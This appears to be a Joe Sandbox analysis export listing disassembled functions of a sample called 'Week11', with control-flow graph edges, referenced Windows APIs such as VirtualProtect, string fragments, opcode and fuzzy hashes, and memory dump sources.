                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: e62e06c91d4d3097d52521295eba65512d7ea56d5a8524d22da75ba4df1c41a9
                                • Instruction ID: 696c6c4412a23ad9e12c94639e277d0de82a665899625c105bb19a87fe962e1d
                                • Opcode Fuzzy Hash: e62e06c91d4d3097d52521295eba65512d7ea56d5a8524d22da75ba4df1c41a9
                                • Instruction Fuzzy Hash: BFD1E5A1D093989EF720CA24DC84BEB7B75EF91304F0441FAD48D66282D67E1FC58B66
                                Function 00405CD5 Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 332COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1408 405cd5-405fde call 405fcd 1413 405fe0-405fe7 1408->1413 1414 405fe9-406027 1408->1414 1413->1414 1415 40602f-4064b5 call 406047 call 406061 call 406498 1413->1415 1414->1415 1431 406db2-41f598 call 406dc7 call 406e2c call 408067 call 40711e 1415->1431 1432 4064bb-406641 1415->1432 1434 406652-4066bb call 4066c8 1432->1434 1435 406643-40664d 1432->1435 1437 4068f9-406932 1434->1437 1435->1437 1439 406934-4074f9 call 40694c call 4074b9 VirtualProtect 1437->1439 1440 406975-406cde 1437->1440 1473 407541-40754d 1439->1473 1474 4074fb-40751a call 40751b 1439->1474 1440->1431 1477 40755e-4075b8 call 40758c 1473->1477
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 9d488ae4a9977ddc856495bf7056b88acf971c96a005eb6715a23b0bb3474d66
                                • Instruction ID: fb7537abd84aad0aac74a9ed5fb5fb3f073c78c9072d4569adba0840b0a107cf
                                • Opcode Fuzzy Hash: 9d488ae4a9977ddc856495bf7056b88acf971c96a005eb6715a23b0bb3474d66
                                • Instruction Fuzzy Hash: 1DD1E6A1D093989EF720CA24DC44BEB7B75EF91304F0441FAD48D66282D67E1FC58B66
                                Function 00405CB0 Relevance: 47.6, APIs: 1, Strings: 26, Instructions: 332COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1332 405cb0-405fde call 405fcd 1337 405fe0-405fe7 1332->1337 1338 405fe9-406027 1332->1338 1337->1338 1339 40602f-4064b5 call 406047 call 406061 call 406498 1337->1339 1338->1339 1355 406db2-41f598 call 406dc7 call 406e2c call 408067 call 40711e 1339->1355 1356 4064bb-406641 1339->1356 1358 406652-4066bb call 4066c8 1356->1358 1359 406643-40664d 1356->1359 1361 4068f9-406932 1358->1361 1359->1361 1363 406934-4074f9 call 40694c call 4074b9 VirtualProtect 1361->1363 1364 406975-406cde 1361->1364 1397 407541-40754d 1363->1397 1398 4074fb-40751a call 40751b 1363->1398 1364->1355 1401 40755e-4075b8 call 40758c 1397->1401
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 211d3e3088454342fa301326de96d46ee4d415014c573bff17096ffaa882fa93
                                • Instruction ID: 92b6b2dc2a0997ca6f386cd95b23f20d0ec3022758b2952666fde0429e6e074c
                                • Opcode Fuzzy Hash: 211d3e3088454342fa301326de96d46ee4d415014c573bff17096ffaa882fa93
                                • Instruction Fuzzy Hash: 77D1E5A1D093989EF720CA24DC84BEB7B75EF91304F0441FAD48D66282D67E1FC58B66
                                Function 0040609D Relevance: 47.5, APIs: 1, Strings: 26, Instructions: 241COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 8377a072d52f9ebfcfd7f54e9b34d00292ac500e2637e1ba882ce4bc64c59695
                                • Instruction ID: 452740b263be536241ad283bf3e93c330d5add207dfb2093bca605b81ef60336
                                • Opcode Fuzzy Hash: 8377a072d52f9ebfcfd7f54e9b34d00292ac500e2637e1ba882ce4bc64c59695
                                • Instruction Fuzzy Hash: 22A1E4A1D092988EF720C624CC44BEA7B75EF92304F0441FAD48D6B282D77E1FD58B66
                                Function 004158C8 Relevance: 28.7, APIs: 2, Strings: 14, Instructions: 721nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: b21e9f2c2aec025707621089db2fa7c514515825e7bc86d2863a1a3f66048495
                                • Instruction ID: 89fd3b04d2d4baae8646865ee7f87ad83dff50b2bf9fe7a18cfbcaf80e498f22
                                • Opcode Fuzzy Hash: b21e9f2c2aec025707621089db2fa7c514515825e7bc86d2863a1a3f66048495
                                • Instruction Fuzzy Hash: 5962DDB1E046688BEB248B14DC80BEABBB1EF85304F1481FAD84D67641D6785EC6CF56
                                Function 004153B1 Relevance: 28.7, APIs: 2, Strings: 14, Instructions: 674nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 2c5a26717fc4dd8589f1bf549b5064ffc8d3bd0a6ed5b1668b52f1502dd1a3b9
                                • Instruction ID: bfe099a527f20717cc112ed4ff80b82e44660bd6727fc85cc469a95e5c3239d1
                                • Opcode Fuzzy Hash: 2c5a26717fc4dd8589f1bf549b5064ffc8d3bd0a6ed5b1668b52f1502dd1a3b9
                                • Instruction Fuzzy Hash: A242D0B1D04668CBEB248B14DC84BEABBB5EB81314F1480FAD80D97681D63D5EC6CF56
                                Function 0041DFF0 Relevance: 28.5, APIs: 1, Strings: 15, Instructions: 516memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: =E8K$AFH6$CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-2295883863
                                • Opcode ID: 05fd5026d9f72dd830fdd9a0d0ff75d43cd43a3017a240becf6162473d2c75f3
                                • Instruction ID: a97093da89676716a8d50661d30509100d59c45049f2c21821849b6fce5cbb74
                                • Opcode Fuzzy Hash: 05fd5026d9f72dd830fdd9a0d0ff75d43cd43a3017a240becf6162473d2c75f3
                                • Instruction Fuzzy Hash: 1922EDB5D052688FEB20CB15DC84BEAB7B6EF84304F0480EAD84DA7281D6799EC1CF55
                                Function 0041595B Relevance: 28.5, APIs: 2, Strings: 14, Instructions: 476nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: d53cdc5a62e6100fd4c838c1b2d9beb7b3b2ac7e4cc2a6cf1de0deaf6661ff5b
                                • Instruction ID: cdb8cd24e33742dcffeaaf835e1a9c09254eb8ab88cd9363f2c2e4cdbd5fece7
                                • Opcode Fuzzy Hash: d53cdc5a62e6100fd4c838c1b2d9beb7b3b2ac7e4cc2a6cf1de0deaf6661ff5b
                                • Instruction Fuzzy Hash: 980201B2D046A88BE7208B24DC44BEABB75EF81300F1540FAD84D67681E67D5EC6CF56
                                Function 00415962 Relevance: 28.5, APIs: 2, Strings: 14, Instructions: 475nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 821dc142a8d940dff084096b8d6f38323c6875251b48bc54231b006069619d9c
                                • Instruction ID: 47569f1af290621fa2d33efe83f452727158299265086f5602c62eab89cc8f84
                                • Opcode Fuzzy Hash: 821dc142a8d940dff084096b8d6f38323c6875251b48bc54231b006069619d9c
                                • Instruction Fuzzy Hash: 780201B2D046A88AE7208B24DC44BEABB75EF81300F1140FED84D67681E67D5EC6CF56
                                Function 004156F5 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 421nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: cc2dd810cd331d2e53c09a30ef1bdddba05b08bcfdc00e1e80ab604d20d2b156
                                • Instruction ID: 6066a46934eae4e9956472194b6b85615ff0f8365c8496f2ed21f4ca1acc74fe
                                • Opcode Fuzzy Hash: cc2dd810cd331d2e53c09a30ef1bdddba05b08bcfdc00e1e80ab604d20d2b156
                                • Instruction Fuzzy Hash: A2F103B2D086A88BE7208B25DC44BEABB75EF81300F1580FED44D57682D63D5EC6CB56
                                Function 00415682 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 421nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: a82194ad6fe9a671fb0c5b0c5200d2debdfd3b86ac4ac1da569667138ab546c5
                                • Instruction ID: 5a287a7c10a4f28cadd7821dd97a0960b6671d0bb999b214bae59d46f241ca3b
                                • Opcode Fuzzy Hash: a82194ad6fe9a671fb0c5b0c5200d2debdfd3b86ac4ac1da569667138ab546c5
                                • Instruction Fuzzy Hash: 49F103B2D046A88BE7208B24DC44BEABB75EB91300F1540FED44D97682D63D5EC68B56
                                Function 0041568F Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 420nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 4c1e5d2152ac2a50194966f8244a2cbeeb43be3d1514b432c64ae83dede3c145
                                • Instruction ID: 5a825557b8c40355e8bfd9e98ed7fb2aca36644187dafd19f575952df63b95ed
                                • Opcode Fuzzy Hash: 4c1e5d2152ac2a50194966f8244a2cbeeb43be3d1514b432c64ae83dede3c145
                                • Instruction Fuzzy Hash: ACF102B2D086A88BE7208B24DC44BEABB75EF91300F1540FED44D97682D63D5EC6CB56
                                Function 00415424 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 417nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: a3c4b2f644ab797c197770f81643419c2f7675c1f63a9f3c39a2cca32cd69fea
                                • Instruction ID: ab020383999a283389cd67a6ff597167e4e1049f29cda5c4bfa3cafdda48b262
                                • Opcode Fuzzy Hash: a3c4b2f644ab797c197770f81643419c2f7675c1f63a9f3c39a2cca32cd69fea
                                • Instruction Fuzzy Hash: 55F101B2D086A88BE7208B24DC44BEABB75EB81300F1540FED44D57682D67D5EC6CB56
                                Function 004156A2 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 416nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: e3d7df320cd93f5d790a4784ae8815276f09b21c4c9268d6aab76a9057aec146
                                • Instruction ID: edd7c9ead9ad02c5a3cd88301e0f370e987421c74df786517860b140cd6ff897
                                • Opcode Fuzzy Hash: e3d7df320cd93f5d790a4784ae8815276f09b21c4c9268d6aab76a9057aec146
                                • Instruction Fuzzy Hash: 57F112B2D086A88BE7208B24DC44BEABB75EF91300F1540FED44D97682D63D4EC6CB56
                                Function 00415787 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 396nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 8973e00ffd1e03b0c02efc8b4891ac6aa2966b39080549be4a6a6fbbb7e11aa4
                                • Instruction ID: 636df44bf019de9ee138f451fd0323d0dbb2bec25e6fc492c377fb333e437c2f
                                • Opcode Fuzzy Hash: 8973e00ffd1e03b0c02efc8b4891ac6aa2966b39080549be4a6a6fbbb7e11aa4
                                • Instruction Fuzzy Hash: 5AE122B2D086A88BE7208B24DC44BEABB75EF81300F1540FED44D97682D67D4EC6CB56
                                Function 004153B6 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 366nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
